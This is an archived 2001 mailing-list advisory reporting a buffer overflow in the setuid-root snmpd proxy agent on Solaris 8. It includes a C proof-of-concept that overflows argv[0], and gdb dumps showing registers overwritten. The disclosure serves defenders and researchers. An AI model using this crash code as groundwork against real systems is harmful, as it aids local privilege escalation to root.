OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Pablo Sor (psorAFIP.GOV.AR)
Date: Tue Mar 13 2001 - 05:34:40 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Description

    The /opt/SUNWssp/snmpd command (SNMP proxy agent) is suid root
    and contains a buffer overflow, the problem occurs when it copy his own
    name (argv[0]) to an internal variable without checking out
    its lenght and this causes the overflow.

    Vulnerable Version

    Sun Solaris 5.8

    Technical Description

    -----------------------------------------------------

    #include <stdio.h>

    void main(int argc,char **argv)
    {
    char *buf;
    buf = (char *) malloc(atoi(argv[1])*sizeof(char));
    memset(buf,0x41,atoi(argv[1])-1);
    buf[atoi(argv[1])-1]=0;
    execl("/opt/SUNWssp/bin/snmpd",buf,(char *)0);
    }

    -----------------------------------------------------

    $ uname -a
    SunOS tomy 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10

    $ ./snmpd-demo 700
    Segmentation Fault (core dumped)

    $ gdb ./snmpd-demo --core=core

    [..]

    Program received signal SIGSEGV, Segmentation fault.
    0xfee32b58 in strcpy () from /usr/lib/libc.so.1
    (gdb) info registers
    g0 0x0 0
    g1 0x78000 491520
    g2 0xff22579c -14526564
    g3 0xff162d78 -15323784
    g4 0x0 0
    g5 0x0 0
    g6 0x0 0
    g7 0x76f98 487320
    o0 0x2c1 705
    o1 0xffbed9b9 -4269639
    o2 0x2c1 705
    o3 0x41 65
    o4 0xffbed180 -4271744
    o5 0xff26a147 -14245561
    sp 0xffbed658 -4270504
    o7 0xfee83650 -18336176
    l0 0x7efefeff 2130640639
    l1 0x81010100 -2130640640
    l2 0xff000000 -16777216
    l3 0xff0000 16711680
    l4 0xff00 65280
    l5 0x0 0
    l6 0x0 0
    l7 0x0 0
    i0 0x41414141 1094795585 ;;;;;
    i1 0xffbed6fc -4270340 ; pointer to argv[0]
    i2 0x41414141 1094795585 ;;;;;
    i3 0x41414141 1094795585 ;;;;;
    i4 0x81010100 -2130640640
    i5 0xff00 65280
    fp 0xffbed698 -4270440
    i7 0xff265474 -14265228
    y 0x6 6
    psr 0xfe001000 -33550336
    wim 0x0 0
    tbr 0x0 0
    pc 0xfee32b58 -18666664
    npc 0xfee32b5c -18666660
    fpsr 0x0 0
    cpsr 0x0 0

    (gdb) x/20x $i1
    0xffbed6fc: 0x41414141 0x41414141 0x41414141 0x41414141
    0xffbed70c: 0x41414141 0x41414141 0x41414141 0x41414141
    0xffbed71c: 0x41414141 0x41414141 0x41414141 0x41414141
    0xffbed72c: 0x41414141 0x41414141 0x41414141 0x41414141
    0xffbed73c: 0x41414141 0x41414141 0x41414141 0x41414141

    Pablo Sor
    psorafip.gov.ar